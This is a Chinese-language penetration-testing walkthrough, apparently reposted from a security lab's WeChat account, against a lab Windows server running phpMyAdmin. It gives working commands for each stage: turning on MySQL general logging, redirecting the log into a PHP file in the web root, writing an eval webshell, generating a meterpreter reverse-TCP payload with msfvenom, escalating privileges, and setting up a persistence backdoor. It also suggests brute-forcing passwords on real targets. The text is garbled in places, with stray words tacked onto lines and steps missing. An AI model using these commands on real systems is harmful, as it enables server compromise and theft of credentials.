一. 環境準備:
靶機:win7 32 位。php
環境:web
php:5.45sql
MYsql:5.5.53shell
Apache:2.4swindows
二. 開始攻擊。
訪問目標站點,發現開啓3306 端口,安全
通過弱口令,爆破,目錄泄露等途徑已經獲知PhpMyadmin的帳號密碼是root root服務器
1.開始登錄到目標服務器的PhpMyadmin
2.檢測MySQL全局變量(generallog、generallog file)的值。
general log 指的是日誌保存狀態,一共有兩個值(ON/OFF)ON表明開啓 OFF表明關閉。微信
general log file 指的是日誌的保存路徑。網絡
SHOW VARIABLES LIKE 'general%'
app
已知general_log默認是關閉的,log日誌存放的位置是C:\php\MySQL\data\SC-201805120002.log
開啓generallog 的做用,開啓它能夠記錄用戶輸入的每條命令,會把其保存在C:\php\MySQL\data\SC-201805120002.log下的一個log文件中,其實就是咱們常說的日誌文件。利用的思路是開啓generallog以後把generallogfile的值修改成咱們網站默認路徑下一個自定義的php文件中,而後咱們經過log日誌進行寫入一句話後門到上面去,而後再進一步利用。
set global general_log = "ON";SET global general_log_file='C:/php/WWW/testshell.php';
在網站的根路徑下生成了testshell.php的文件夾。
### 而後執行插入一句話木馬。
select '<?php eval($_POST[cmd]);?>';
### 這時經過瀏覽訪問一下一句話木馬。
5.經過蟻劍鏈接一句話木馬。
發現如今獲取的權限爲administrator權限,經過msf下getsystem來進行提權。
### 生成exe的反彈鏈接木馬
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4444 -f exe >testshell.exe
將生成的木馬經過蟻劍上傳到目標服務器並執行。
7.開msf監聽,
使用getsystem來進行提權。
### 創建後門。
生成的後門文件路徑:
後門加載成功
利用方式:
當用戶登陸到遠程系統時,爲咱們打開一個Meterpreter會話
### 鏈接後門
成功。
總結:
1.在獲取密碼的過程當中因爲是本地搭建的,因此是知道密碼的在實際使用中能夠採用爆破的方式獲取密碼。
2.在獲取一句話反彈鏈接後嘗試獲取密碼失敗,後面在msf下獲取hash成功獲取目標登陸密碼。
掃描下方二維碼學習更多WEB安全知識:
本文分享自微信公衆號 - Ms08067安全實驗室(Ms08067_com)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。